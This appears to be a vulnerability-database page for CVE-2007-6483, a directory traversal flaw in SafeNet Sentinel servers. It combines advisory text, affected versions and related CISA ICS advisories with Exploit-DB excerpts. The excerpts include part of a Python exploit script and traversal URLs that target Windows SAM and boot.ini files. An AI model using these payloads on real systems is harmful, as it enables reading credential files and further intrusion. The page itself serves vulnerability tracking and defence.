CVE-2007-6483
published 2007-12-20CVE-2007-6483: Directory traversal vulnerability in SafeNet Sentinel Protection Server 7.0.0 through 7.4.0 and possibly earlier versions, and Sentinel Keys Server 1.0.3 and…
PriorityP335medium5CVSS 2.0
AVNACLAuNCNIPAN
EXPLOIT
EPSS
10.36%
95.1th percentile
Directory traversal vulnerability in SafeNet Sentinel Protection Server 7.0.0 through 7.4.0 and possibly earlier versions, and Sentinel Keys Server 1.0.3 and possibly earlier versions, allows remote attackers to read arbitrary files via a .. (dot dot) in the query string.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| safenet | sentinel_keys_server | <= 1.0.4.0 | — |
| safenet | sentinel_keys_server | — | — |
| safenet | sentinel_protection_server | <= 7.4.1 | — |
| safenet | sentinel_protection_server | — | — |
| safenet | sentinel_protection_server | — | — |
| safenet | sentinel_protection_server | — | — |
| safenet | sentinel_protection_server | — | — |
| safenet | sentinel_protection_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-3qrh-x7rc-6p32: Directory traversal vulnerability in SafeNet Sentinel Protection Server 7
ghsa_unreviewed·2022-05-01
CVE-2007-6483 [MEDIUM] CWE-22 GHSA-3qrh-x7rc-6p32: Directory traversal vulnerability in SafeNet Sentinel Protection Server 7
Directory traversal vulnerability in SafeNet Sentinel Protection Server 7.0.0 through 7.4.0 and possibly earlier versions, and Sentinel Keys Server 1.0.3 and possibly earlier versions, allows remote attackers to read arbitrary files via a .. (dot dot) in the query string.
GHSA
GHSA-q2wj-hqvv-9cm2: Directory traversal vulnerability in SafeNet Sentinel Protection Server 7
ghsa_unreviewed·2022-05-01·CVSS 5.0
CVE-2008-0760 [MEDIUM] CWE-22 GHSA-q2wj-hqvv-9cm2: Directory traversal vulnerability in SafeNet Sentinel Protection Server 7
Directory traversal vulnerability in SafeNet Sentinel Protection Server 7.4.1.0 and earlier, and Sentinel Keys Server 1.0.4.0 and earlier, allows remote attackers to read arbitrary files via a ..\ (dot dot backslash) in the URI. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2007-6483.
CISA ICS
ICONICS GENESIS (32 & 64) Vulnerabilities
cisa_ics·2018-09-06·CVSS 5.0
[MEDIUM] ICONICS GENESIS (32 & 64) Vulnerabilities
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
ICONICS GENESIS (32 & 64) Vulnerabilities
Last RevisedSeptember 06, 2018
Alert CodeICSA-11-108-01
## OVERVIEW
This advisory is a follow-up to ICS-ALERT-11-080-02 ICONICS GENESIS (32 & 64) Vulnerabilities, published on the ICS-CERT Web site on March 20, 2011.
An independent security researcher has published 13 vulnerabilities with proof of concept (PoC) code for the ICONICS GENESIS32 and GENESIS64 human-machine interface (HMI)/supervisory control and data acquisition (SCADA) products.
The 13 remotely exploitable vulnerabilities exploit the GenBroker.exe service on Port 38080/TC
CISA ICS
Honeywell Experion PKS Directory Traversal Vulnerability
cisa_ics·2018-08-27
Honeywell Experion PKS Directory Traversal Vulnerability
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
Honeywell Experion PKS Directory Traversal Vulnerability
Last RevisedAugust 27, 2018
Alert CodeICSA-15-272-01
## OVERVIEW
Independent researcher Joel Langill identified a directory traversal vulnerability in Honeywell’s Experion PKS application. This vulnerability exists in all unsupported phased out versions of the application that is still in use by some customers. Honeywell has recommended users of the vulnerable versions upgrade to supported versions of the software, which have patches available.
This vulnerability could be exploited remotely. Exploits that target this vuln
No detection rules found.
Exploit-DB
SafeNet Sentinel Protection Server 7.0 < 7.4 / Sentinel Keys Server 1.0.3 < 1.0.4 - Directory Traversal
exploitdb·2014-05-19·CVSS 5.0
CVE-2007-6483 [MEDIUM] SafeNet Sentinel Protection Server 7.0 < 7.4 / Sentinel Keys Server 1.0.3 < 1.0.4 - Directory Traversal
SafeNet Sentinel Protection Server 7.0 [options]'
print ' : The victim host\n'
print ' Options:'
print ' --port The port the application is listening on (default: 7002)'
print ' --file Path to the desired remote file (ex. windows/repair/sam) without starting slash\n\n'
sys.exit(1)
# Parse Arguments
parser = argparse.ArgumentParser()
parser.add_argument('--host', required = True)
parser.add_argument('--port', type = int, default = 7002)
parser.add_argument('--file')
args = parser.parse_args()
# Define Variables
host = args.host
port = args.port
if args.file is not None :
targetFile = [args.file]
else:
targetFile = ['windows/repair/default', 'windows/repair/sam', 'windows/repair/system', 'windows/repair/software', 'windows/repair/security', 'boot.ini', 'windows/win.ini']
# Send Exploit
pr
Exploit-DB
SafeNet Sentinel Protection Server 7.x/Keys Server 1.0.3 - Directory Traversal
exploitdb·2007-11-26
CVE-2007-6483 SafeNet Sentinel Protection Server 7.x/Keys Server 1.0.3 - Directory Traversal
SafeNet Sentinel Protection Server 7.x/Keys Server 1.0.3 - Directory Traversal
---
source: https://www.securityfocus.com/bid/26583/info
Sentinel Protection Server and Keys Server are prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue may allow an attacker to access sensitive information that could aid in further attacks.
This issue affects Protection Server 7.0.0 through 7.4.0, and Keys Server 1.0.3; earlier versions may also be vulnerable.
http://www.example.com:6002/../../../../../../boot.ini
http://www.example.com:7002/../../../../../../winnt/repair/sam
No writeups or analysis indexed.
http://safenet-inc.com/support/files/SPI740SecurityPatch.ziphttp://secunia.com/advisories/27811http://securityreason.com/securityalert/3471http://www.securityfocus.com/archive/1/484201/100/200/threadedhttp://www.securityfocus.com/archive/1/484224/100/200/threadedhttp://www.securityfocus.com/bid/26583http://www.securitytracker.com/id?1018992http://www.vupen.com/english/advisories/2007/4011https://exchange.xforce.ibmcloud.com/vulnerabilities/38636https://ics-cert.us-cert.gov/advisories/ICSA-15-272-01http://safenet-inc.com/support/files/SPI740SecurityPatch.ziphttp://secunia.com/advisories/27811http://securityreason.com/securityalert/3471http://www.securityfocus.com/archive/1/484201/100/200/threadedhttp://www.securityfocus.com/archive/1/484224/100/200/threadedhttp://www.securityfocus.com/bid/26583http://www.securitytracker.com/id?1018992http://www.vupen.com/english/advisories/2007/4011https://exchange.xforce.ibmcloud.com/vulnerabilities/38636https://ics-cert.us-cert.gov/advisories/ICSA-15-272-01
2007-12-20
Published